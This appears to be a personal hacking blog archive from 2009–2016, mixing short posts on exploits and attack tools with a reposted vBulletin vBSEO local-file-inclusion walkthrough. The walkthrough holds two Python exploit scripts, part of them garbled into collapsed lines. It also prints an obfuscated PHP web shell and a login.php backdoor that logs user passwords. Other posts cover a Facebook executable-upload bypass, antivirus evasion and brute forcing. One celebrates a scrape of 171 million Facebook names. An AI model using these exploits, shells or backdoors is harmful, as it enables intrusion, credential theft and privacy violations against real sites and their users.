IT-Security ©

Hey guys!!

2015-12-15T13:21:00.001-08:00

Hey ppl i was a bit busy whith life and stuff sorry for no new posts long time
somthing new will come soon :)

# ITS © # 2009 - 2016

Mozilla Firefox Array.reduceRight() Vulnerability

2011-10-30T09:55:00.000-07:00

This module exploits a vulnerability found in Mozilla Firefox 3.6 when an array object is configured with a large length value , the reduceRigh() method may cause an invalid index being used , allowing arbitary remote code execution . Please note that the exploit requires a longer amount of time ( compare to a typical browser exploit) in order to gain control of the machine
More : http://www.exploit-db.com/exploits/17612/

# ITS ©
# 2009 - 2011

Facebook Attach EXE Vulnerability

2011-10-28T07:49:00.000-07:00

----------------------------------------------------------------------------------------------------------------------------------------
1. Summary:

When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment.

----------------------------------------------------------------------------------------------------------------------------------------
2. Description:

When attaching an executable file, Facebook will return an error message stating:

"Error Uploading: You cannot attach files of that type."

When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line:

Content-Disposition: form-data; name="attachment"; filename="cmd.exe"

It was discovered the variable 'filename' was being parsed to determine if the file type is allowed or not.

To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so:

filename="cmd.exe "

This was enough to trick the parser and allow our executable file to be attached and sent in a
message.

----------------------------------------------------------------------------------------------------------------------------------------
3. Impact:

Potentially allow an attacker to compromise a victim’s computer system.

----------------------------------------------------------------------------------------------------------------------------------------
4. Affected Products:

www.facebook.com

----------------------------------------------------------------------------------------------------------------------------------------
5. Time Table:

09/30/2011 Reported Vulnerability to the Vendor
10/26/2011 Vendor Acknowledged Vulnerability
10/27/2011 Publicly Disclosed

----------------------------------------------------------------------------------------------------------------------------------------
6. Credits:

Discovered by Nathan Power
www.securitypentest.com

----------------------------------------------------------------------------------------------------------------------------------------

# ITS ©
# 2009 - 2011

Clickjacking for Shells

2011-10-08T04:42:00.000-07:00

Andrew Horton (urbanadventurer) presented Clickjacking for Shells at the OWASP Wellington, New Zealand Chapter Meeting on September 20th, 2011.

Two years after the world was warned about clickjacking, popular web apps are still vulnerable and no web app exploits have been published. With many security pros considering clickjacking to have mere nuisance value on social networks, the attack is grossly underestimated. I will demonstrate step by step how to identify vulnerable applications, how to write exploits that attack web apps and also how to protect against clickjacking. To demonstrate this issue I will publish an 0day clickjacking exploit for WordPress v3.1.2 and earlier to gain a shell on the webserver. In May this year the tech media reported and speculated upon clickjacking protection being implemented in WordPress and now I will show you why it is so important.
# ITS © # 2009 - 2011

Webdav IIS6 bypass and code execution

2011-02-16T01:56:00.000-08:00

# ITS ©
# 2009 - 2011

XSS Shell Zombie Manager

2011-02-08T02:41:00.000-08:00

XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by "XSS-Proxy - http://xss-proxy.sourceforge.net/". Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim. you can backdoor the page.

You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.

# ITS ©

# 2009 - 2011

Metasploit and VNC Password Bruteforcing

2011-01-11T10:34:00.000-08:00

You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.
This is awesome because before that I had to use Immunity's VAAseline to do VNC bruteforcing. But now you can just use vnc_login.
So the scenario is you find yourself on the other end of a VNC server.

Its tedious to password guess like this
Instead let's use the metasploit module

and throw a dictionary attack against the VNC server

Looks like the VNC no auth module had been ported and stuck in there too :-)

# ITS ©
# 2009 - 2011

vBulletin – Not So Secure Anymore

2010-08-16T11:22:00.000-07:00

Some time ago, an LFI vulnerability within vBSEO was discovered, which allowed an attacker to include locally hosted files. The challenge, when confronted with an LFI vulnerability, is to leverage it into executing arbitrary code of our choosing.

Many vBulletin installations are using this addon to improve their SEO drastically, however many of them are not fully patched which is good for us, but very bad for those that host a vulnerable web application.

In many cases, it is not piece of cake to exploit LFI, aka Local File Inclusion, vulnerabilities due to the fact it may not be easy to upload content to the target server. In some scenarios, it is possible to inject PHP code into access logs and in others, it is possible to include binary MySQL files. It should be noted though, that it is usually impossible to always know where these files are stored.

Of course, we can guess where these files are stored, but we may still not be sure how the server is configured and if this approach will work.

Reconnaissance

First, we need to determine whether our target is vulnerable or not. This can be done by requesting to include a local script in the following manner:

http://our-target.tld/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html

Please note that some installations may appear to be vulnerable even though they’re not.

From our basic check above, we would like to test whether our target really is vulnerable to Local File Inclusions. We do this by creating a small txt file with ‘phpinfo()’ in it which we will upload to our target via the attachment manager. Some vBulletin installations store attachments locally, which can be abused in this case to include a shell or similar malicious code IF we know the physical location of our file and if there’s a vulnerability which allows us to do that.

Exploitation

In order to find the physical location of our uploaded file we need to find the attachment directory and scan through the subdirectories. I’ve created a small tool for this task, which is far from complete but it does work on some hosts. You can get the basic version is as follows:

#!/usr/bin/python

# ______ __ __ __ __ ______
# /\__ _\ /\ \__ /\ \/\ \ /'__`\/\__ _\
# \/_/\ \/ ___\ \ ,_\ __ _ __\ \ `\\ \/\ \/\ \/_/\ \/
# \ \ \ /' _ `\ \ \/ /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \
# \_\ \__/\ \/\ \ \ \_/\ __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \
# /\_____\ \_\ \_\ \__\ \____\\ \_\ \ \_\ \_\ \____/ \ \_\
# \/_____/\/_/\/_/\/__/\/____/ \/_/ \/_/\/_/\/___/ \/_/
# --------------------------------------------------------
# Title: vBSEO LFI Assistant Tool
# Author: MaXe
# Site: http://www.intern0t.net
#
# Description: 1) Checks whether the vBSEO installation
# is patched or not. 2) Attempts to find
# the physical location of an uploaded
# attachment phile. (PHP Shell)
#
# Version: 2.1.4 - Reversed Algorithm - Basic Version
#
# License: -- Attribution-ShareAlike 3.0 Unported --
# http://creativecommons.org/licenses/by-sa/3.0/
#
# Notes: The basic version does not contain multi-
# threading nor is it able to search through
# multiple sub directories which the advanced
# version will be able to.
# Please note, that this tool does not work on
# all types of hosts and you should therefore
# modify this script to your own needs.
#
# Disclaimer: This tool is meant for ethical purposes only.

# Import the appropriate libraries.
import os
import re
import httplib
import sys

# Clear the screen in a sufficient way.
if(os.name) == "posix":
os.system("clear")
elif(os.name) == "nt":
os.system("cls")
else:
print "[!] Cannot clear screen automatically.\n"

print "File Finder by MaXe from InterN0T.net\n\n"

# Get user-input and define global variables.
target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
main_dir = ["attach","attachment","attachments","download"]
poss_main_dir = []
sub_dir = []

# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', target)

# Perform a simple LFI to check whether the target is vulnerable or not.
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Checking if site appears to be vulnerable."
conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
resp = conn.getresponse()

# If the response code is 200 OK, check if the file really was included.
if resp.status == 200:
print "[+] Site is responding, this is good."
if re.search("(Enter text...)", resp.read()):
print ">> The site appears to be vulnerable!"
else:
print "[!] The site appears to be patched. (unknown error)"

elif resp.status == 404:
print "[!] The site appears to be patched. (404)"

# Search for attachment directories
for value in main_dir[0:]:
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Trying: http://%s/%s/" % (newtarget,value)
conn.request("HEAD", "/%s/" % value)
resp = conn.getresponse()

# If the response code is 403 (Forbidden), set a new variable and continue.
if resp.status == 403:
print "[+] Directory found: /%s/" % value

if poss_main_dir == []:
poss_main_dir = ["%s" % value]
else:
poss_main_dir += ["%s" % value]

conn.close()

if poss_main_dir == []:
print "[!] No directories were found, exiting."
sys.exit()

# Search for possible sub directories
for value in poss_main_dir:

i = 0
print "[*] Trying subdirs within: http://%s/%s/" % (newtarget,value)
while i <= 9: conn = httplib.HTTPConnection(newtarget, 80) conn.request("HEAD", "/%s/%s/" % (value,i)) resp = conn.getresponse() if resp.status == 403: print "[+] Sub Directory found: /%s/%s/" % (value,i) found = "%s/%s" % (value,i) if sub_dir == []: sub_dir = ["%s" % found] else: sub_dir += ["%s" % found] i=i+1 conn.close() if sub_dir == []: print "[!] No sub directories were found, exiting." sys.exit() # Search all the sub directories found for our phile for value in sub_dir[0:]: i = 99 print "[*] Trying to find our file within: /%s/" % value while i >= 0:
conn = httplib.HTTPConnection(newtarget, 80)
conn.request("GET", "/%s/%s.attach" % (value,i))
resp = conn.getresponse()

if resp.status == 200:
print "[+] File found, does it match our keyword? >>%s" % file_match

if re.search("(%s)" % file_match, resp.read()):
print ">> File contains our keyword!"
print "Part URL: /%s/%s.attach" % (value,i)
print "Full URL: http://" + newtarget + "/%s/%s.attach \n" % (value,i)
sys.exit(0)

i=i-1
conn.close()

# Don't forget, that this script can be used for more than one thing.

The multi-threaded version is shown below. Keep in mind that the multi-threaded version is a bit buggy, because I didn’t synchronize the threads.

#!/usr/bin/python

# ______ __ __ __ __ ______
# /\__ _\ /\ \__ /\ \/\ \ /'__`\/\__ _\
# \/_/\ \/ ___\ \ ,_\ __ _ __\ \ `\\ \/\ \/\ \/_/\ \/
# \ \ \ /' _ `\ \ \/ /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \
# \_\ \__/\ \/\ \ \ \_/\ __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \
# /\_____\ \_\ \_\ \__\ \____\\ \_\ \ \_\ \_\ \____/ \ \_\
# \/_____/\/_/\/_/\/__/\/____/ \/_/ \/_/\/_/\/___/ \/_/
# --------------------------------------------------------
# Title: vBSEO LFI Assistant Tool
# Author: MaXe
# Site: http://www.intern0t.net
#
# Description: 1) Checks whether the vBSEO installation
# is patched or not. 2) Attempts to find
# the physical location of an uploaded
# attachment phile. (PHP Shell)
#
# Version: 2.2.3 - Multi-Threading! - Basic Version
#
# License: -- Attribution-ShareAlike 3.0 Unported --
# http://creativecommons.org/licenses/by-sa/3.0/
#
# Notes: Please note, that this tool does not work on
# all types of hosts and you should therefore
# modify this script to your own needs.
# Multi-Threading in this tool is very buggy!
#
# Disclaimer: This tool is meant for ethical purposes only.

# Import the appropriate libraries.
import os
import re
import httplib
import sys
import thread
import time

# Clear the screen in a sufficient way.
if(os.name) == "posix":
os.system("clear")
elif(os.name) == "nt":
os.system("cls")
else:
print "[!] Cannot clear screen automatically.\n"

print "File Finder by MaXe from InterN0T.net\n\n"

# Get user-input and define global variables.
target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
main_dir = ["attach","attachment","attachments","download"]
poss_main_dir = []
sub_dir = []

# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', target)

# Perform a simple LFI to check whether the target is vulnerable or not.
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Checking if site appears to be vulnerable."
conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
resp = conn.getresponse()

# If the response code is 200 OK, check if the file really was included.
if resp.status == 200:
print "[+] Site is responding, this is good."
if re.search("(Enter text...)", resp.read()):
print ">>The site appears to be vulnerable!"
else:
print "[!] The site appears to be patched. (unknown error)"

elif resp.status == 404:
print "[!] The site appears to be patched. (404)"

# Define a multi-threaded function for locating the attachment directory.
def findMainDir(target, array):
global poss_main_dir
conn = httplib.HTTPConnection(target, 80)
print "[*] Trying: http://%s/%s/" % (target,array)
conn.request("HEAD", "/%s/" % array)
resp = conn.getresponse()

# If the response code is 403 (Forbidden), set a new variable and continue.
if resp.status == 403:
print "[+] Directory found: /%s/" % array

if poss_main_dir == []:
poss_main_dir = ["%s" % array]
else:
poss_main_dir += ["%s" % array]

conn.close()

# Define a multi-threaded function to scan for sub directories.
def findSubDir(target, array):
global sub_dir
i = 0
print "[*] Trying subdirs within: http://%s/%s/" % (target,array)
while i <= 9: conn = httplib.HTTPConnection(target, 80) conn.request("HEAD", "/%s/%s/" % (array,i)) resp = conn.getresponse() if resp.status == 403: print "[+] Sub Directory found: /%s/%s/" % (array,i) found = "%s/%s" % (array,i) if sub_dir == []: sub_dir = ["%s" % found] else: sub_dir += ["%s" % found] i=i+1 conn.close() # Define a multi-threaded function to find our phile. # Developer Note: This function has a sub-function # (while) which could be multi-threaded # as well to speed up the process. def findPhile(target,array): i = 99 print "[*] Trying to find our file within: /%s/" % array while i >= 0:
conn = httplib.HTTPConnection(target, 80)
conn.request("HEAD", "/%s/%s.attach" % (array,i))
resp = conn.getresponse()

if resp.status == 200:
print "[+] File found, does it match our keyword? >>%s" % file_match
conn = httplib.HTTPConnection(target, 80)
conn.request("GET", "/%s/%s.attach" % (array,i))
resp = conn.getresponse()
if re.search("(%s)" % file_match, resp.read()):
print ">>File %s.attach contains our keyword!" % i
print "Part URL: /%s/%s.attach" % (array,i)
print "Full URL: http://" + target + "/%s/%s.attach \n" % (array,i)
sys.exit(0)

i=i-1
conn.close()

# For each value in main_dir (array / list), start a new thread.
for value in main_dir[0:]:
try:
thread.start_new_thread(findMainDir, (newtarget,value))
time.sleep(1)
except KeyboardInterrupt:
print "Quitting.."
sys.exit()
except:
print "[!] Could not create any threads. Quitting.."
sys.exit(1)

# Check if any values were assigned to the poss_main_dir array. If not, quit.
if poss_main_dir == []:
print "[!] No directories were found, quitting."
sys.exit()

for value in poss_main_dir[0:]:
try:
thread.start_new_thread(findSubDir, (newtarget,value))
time.sleep(1)
except KeyboardInterrupt:
print "Quitting.."
sys.exit()
except:
print "[!] Could not create any threads. Quitting.."
sys.exit(1)

if sub_dir == []:
print "[!] No sub directories were found, quitting."
sys.exit()

for value in sub_dir[0:]:
try:
thread.start_new_thread(findPhile,(newtarget,value))
time.sleep(1)
except KeyboardInterrupt:
print "Quitting.."
sys.exit()
except:
print "[!] Could not create any threads. Quitting.."
sys.exit(1)

try:
print "Waiting for threads.."
time.sleep(60)
except KeyboardInterrupt:
print "Quitting.."
except:
print "[!] Error"

# Don't forget, that this script can be used for more than one thing.

Hopefully our tool finds the attachment directory, and scans through the subdirectories for our file as shown in the screenshot below.

If we request the location of our file in our web browser, then we’re shown a text version of our file. Lets try to include that and see what happens:

As you can see, we were succesful.

Now, I don’t like to use those fancy C99 shells and such. In fact I prefer simple shells made or written by myself. For this purpose I’ve written a web application which allows me to create these, with different methods of input, encoding and even functions to be called. In this case I choose a GET-request, the system() php call, and “shellcode-style” encoding.

Which results in the following code:

?php eval("\x65\x72\x72\x6f\x72\x5f\x72\x65\x70\x6f\x72\x74\x69\x6e\x67\x28\x30\x29\x3b\x65\x63\x68\x6f\x20\x40\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x22\x70\x77\x6e\x22\x5d\x29\x3b"); ?

We upload this to our target and include this file, and call a basic system function such as “ls -al” via the “pwn” GET-request in this case, which is successful.

Post Exploitation

At this point we can pretty much do anything we would like to, such as dumping the database for no good since all passwords are salted and will take pretty much forever to crack. Another more serious and blackhat approach I experienced on my own forum, is to alter the login.php file so that every time someone logs in, the information is saved in a seemingly harmless file.

?php

/* This code was placed inside login.php
Look at the comments for further details.
*/

/* 1) Fopen
Open a file named profilepic12_2.gif and append data to it. Disable any errors this may cause in case of failure. The path defined is static.
( fopen($var, "a"); Explanation: Open for writing only; place the file pointer at the end of the file. If the file does not exist, attempt to create it. ) */
$fp = @fopen('/homepages/xxx/xxxxxxxxxx/htdocs/xxxxxxxxxxxxxxxxx/customprofilepics/profilepic12_2.gif', "a");

/* If the file was opened or created succesfully then. */
if ($fp) {

/* Write the following Base64-encoded fields to the file on one line:
The current date, Username, Password, IP-Address, User-Agent and a New Line ( \n ).
This also has error reporting specificly disabled. Just in case. */
@fputs($fp, base64_encode(date("r") . "|" . $vbulletin->GPC['vb_login_username'] . "|" . $vbulletin->GPC['vb_login_password'] . "|" . $_SERVER['REMOTE_ADDR'] . "|" . $_SERVER['HTTP_USER_AGENT']) . "\n");

/* Close the file, error reporting is specificly disabled too here. */
@fclose($fp);
}

/* End of the custom-coded backdoor. */
?

After a few days if the attack hasn’t been detected, loads of user accounts will be located within this file, which the attacker can use to his or her advantage.

Author [ MaXe ]

References:
[1] vBSEO LFI Proof of Concept
[2] Static link to basic.py
[3] Static link to threading.py

Return of the Facebook Snatchers

2010-07-27T02:58:00.000-07:00

Credits for this goes to www.skullsecurity.org/blog/

First and foremost: if you want to cut to the chase, just download the torrent. If you want the full story, please read on....

Background

Way back when I worked at Symantec, my friend Nick wrote a blog that caused a little bit of trouble for us: Attack of the Facebook Snatchers. I was blog editor at the time, and I went through the usual sign off process and, eventually, published it. Facebook was none too happy, but we fought for it and, in the end, we got to leave the blog up in its original form.

Why do I bring this up? Well last week @FSLabsAdvisor wrote an interesting Tweet: it turns out, by heading to https://www.facebook.com/directory, you can get a list of every searchable user on all of Facebook!

My first idea was simple: spider the lists, generate first-initial-last-name (and similar) lists, then hand them over to @Ithilgore to use in Nmap's awesome new bruteforce tool he's working on, Ncrack.

But as I thought more about it, and talked to other people, I realized that this is a scary privacy issue. I can find the name of pretty much every person on Facebook. Facebook helpfully informs you that "[a]nyone can opt out of appearing here by changing their Search privacy settings" -- but that doesn't help much anymore considering I already have them all (and you will too, when you download thetorrent). Suckers!

Once I have the name and URL of a user, I can view, by default, their picture, friends, information about them, and some other details. If the user has set their privacy higher, at the very least I can view their name and picture. So, if any searchable user has friends that are non-searchable, those friends just opted into being searched, like it or not! Oops :)

The lists

Which brings me to the next topic: the list! I wrote a quick Ruby script (which has since become a more involved Nmap Script that I haven't used for harvesting yet) that I used to download the full directory. I should warn you that it isn't exactly the most user friendly interface -- I wrote it for myself, primarily, I'm only linking to it for reference. I don't really suggest you try to recreate my spidering. It's a waste of several hundred gigs of bandwidth.

The results were spectacular. 171 million names (100 million unique). My original plan was to use this list to generate a list of the top usernames (based on first initial last name):

129369 jsmith
  79365 ssmith
  77713 skhan
  75561 msmith
  74575 skumar
  72467 csmith
  71791 asmith
  67786 jjohnson
  66693 dsmith
  66431 akhan

Or first name last initial:

100225 johns
  97676 johnm
  97310 michaelm
  93386 michaels
  88978 davids
  85481 michaelb
  84824 davidm
  82677 davidb
  81500 johnb
  77800 michaelc

Or even the top usernames based on first name dot last name (sorry, I can't link this one due to bandwidth concerns; but it's included in the torrent):

17204 john.smith
   7440 david.smith
   7200 michael.smith
   6784 chris.smith
   6371 mike.smith
   6149 arun.kumar
   5980 james.smith
   5939 amit.kumar
   5926 imran.khan
   5861 jason.smith

Or even the most common first or last names:

977014 michael
 963693 john
 924816 david
 819879 chris
 640957 mike
 602088 james
 584438 mark
 515686 jason
 503658 robert
 484403 jessica

 913465 smith
 571819 johnson
 512312 jones
 503266 williams
 471390 brown
 386764 lee
 360010 khan
 355639 singh
 343220 kumar
 324972 miller

So, those are the top 10 lists. But I'll bet you want everything!

The Torrent

But it occurred to me that this is public information that Facebook puts out, I'm assuming for search engines or whatever, and that it wouldn't be right for me to keep it private. Why waste Facebook's bandwidth and make everybody scrape it, right?

So, I present you with: a torrent! If you haven't download it, download it now! And seed it for as long as you can.

This torrent contains:

The URL of every searchable Facebook user's profile
The name of every searchable Facebook user, both unique and by count (perfect for post-processing, datamining, etc)
Processed lists, including first names with count, last names with count, potential usernames with count, etc
The programs I used to generate everything

So, there you have it: lots of awesome data from Facebook. Now, I just have to find one more problem with Facebook so I can write "Revenge of the Facebook Snatchers" and complete the trilogy. Any suggestions? >:-)

Hacking Software Updates with EvilGrade

2010-05-23T06:32:00.000-07:00

Evilgrade is a modular framework that allow us to take advantage of poor upgrade implementations by injecting fake updates. It works with modules, each module implements the structure needed to emulate a false update of specific applications/systems. Evilgrade needs the manipulation of the victim dns traffic and uses either of DNS cache poisoning, ARP spoofing, DHCP spoofing or Internal DNS access to accomplish this. Once EvilGrade has inserted itself as the man-in-the-middle it intercepts automatic update requests for the softwares it supports and injects the malicious payload as the "update". This payload can be configured to whichever binary the hacker wants. Once the victim downloads this malicious "update" and runs it, the hacker has full control of his system

Currently, EvilGrade Supports the interception of the following upgrade mechanisms:

- Java plugin

- Winzip

- Winamp

- MacOS

- OpenOffices

- iTunes

- Linkedin Toolbar

- DAP [Download Accelerator]

- notepad++

- speedbit

We had covered EvilGrade a while back. In this demo, g0tmi1k shows us a demo of EvilGrade using Notepad Plus. The underlying hack uses an ARP MITM and DNS Poisoning to redirect all software upgrade request checks to the attacker's server. This server serves a metasploit payload to Notepad Plus instead of the actual payload. Once the update gets exectuted a reverse connect shell provides full access to the victim's computer.

# ITS™

# 2009 - 2010

Twitter based Botnet Command and Control

2010-05-23T05:35:00.000-07:00

In this video from Symantec, we look at a demo of the Trojan.Twetbot trojan. As the name suggests, the builder is closely linked to Twitter, using a Twitter account to issue command-and-control instructions to the Trojans created by the builder. When building Trojan.Twebot, the user is able to supply a public Twitter account for Trojan.Twebot to follow. Because Trojan.Twebot does not try to obfuscate commands on Twitter, it will not be difficult for Twitter security staff to find and close accounts abusing their service in this way.

# ITS™

# 2009 - 2010

Null Session Hacking on Windows

2010-05-23T05:29:00.000-07:00

Practical Exploitation - Null Session Enum from .

A NULL session connection is an unauthenticated connection to an Windows machine. Gaining NULL session access to a Windows system is the number one method for hackers to enumerating information about the machine. From a NULL session hackers can call APIs and use Remote Procedure calls to enumerate information. These techniques can, and will provide information on passwords, groups, services, users and even active processors. NULL session access can also even be used for escalating privileges and perform DoS attacks.

# ITS™
# 2009 - 2010

===[ ADS ]===
Microsoft Windows XP Home Edition UPGRADE with SP2
Microsoft Windows XP Professional Full Version with SP2

Root Shell via Metasploit and MySQL Client on Metasploitable

2010-05-23T05:08:00.000-07:00

In this video, redmeat_uk demonstrates how to obtain a root shell from Metasploitable, a VMware machine of vulnerable applications and services. This example will demonstrate how to obtain a root shell via Metasploit auxiliary modules and the MySQL client

# ITS™

# 2009 - 2010

Using Fireforce to brute-force web login forms

2010-03-10T02:38:00.000-08:00

Fireforce is a Firefox extension designed to perform brute-force attacks on GET and POST forms. Fireforce can use dictionaries or generate passwords based on several character types. Attacks can be performed on two separate fields using two distinct password sources. Fireforce can be used on any platform running the Firefox web browser and is distributed under GPL licence. You can download it from here.

ITS™

2009-2010

Setting up the HoneyBot Honeypot

2010-02-25T02:28:00.000-08:00

A Honeypot is a device placed on a computer network specifically designed to capture malicious network traffic. The logging capability of a honeypot is far greater than any other network security tool and captures raw packet level data even including the keystrokes and mistakes made by hackers. The captured information is highly valuable as it contains only malicious traffic with little to no false positives. Honeypots are becoming one of the leading security tools used to monitor the latest tricks and exploits of hackers by recording their every move so that the security community can more quickly respond to new exploits.

HoneyBOT works by opening a large range of listening sockets on your computer from which a selection of these sockets are designed to mimic vulnerable services. When an attacker connects to these services they are fooled into thinking they are attacking a real server. The honeypot safely captures all communications with the attacker and logs these results for future analysis. Should an attacker attempt an exploit or upload a rootkit or trojan to the server the honeypot environment can safely store these files on your computer for malware collection and analysis purposes. " Download HoneyBot Honeypot "

# ITS™ ©

# 2009 - 2010

From Static Analysis to 0day Exploit

2010-02-25T02:18:00.000-08:00

# ITS ©

# 2009 - 2010

Kitrap0d in Metasploit 3.3.4 Dev

2010-02-03T11:23:00.000-08:00

# ITS ©

# 2009 - 2010

The Aurora IE Exploit in Metasploit

2010-02-03T11:20:00.000-08:00

# ITS ©

# 2009 - 20010

Happy New Year 2010 !!

2009-12-31T11:22:00.001-08:00

# ITS ©

# 2008 - 2009

Metasploit AV Evasion Technique

2009-11-30T02:28:00.000-08:00

How to modify the meterpreter binary and make it undetectable by an Anti-Virus.

# ITS™

# 2008 - 2009

Hacking WPA with Pyrit

2009-11-22T14:00:00.000-08:00

Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocols that protect today's public WIFI-airspace. Pyrit's implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol's security. Exploiting the computational power of Many-Core- and other platforms through ATI-Stream, Nvidia CUDA, OpenCL and VIA Padlock.

Modifying an MSN Conversation using an Ettercap Filter

2009-11-22T13:57:00.000-08:00

In this video, Thomas shows us how to modify an MSN conversation at the network level. He uses an Ettercap filter and MITM attack to make this happen. The basic idea is to hijack the victim's Layer 2 and have all his traffic go through the attacker. Then the attacker can modify the traffc on the fly and inject it back into the network.

Gmail Flash Exploit

2009-11-13T10:28:00.001-08:00

Websense Threatscape

2009-11-13T00:53:00.000-08:00

Bypassing 403 Forbidden Errors

2009-11-13T00:50:00.000-08:00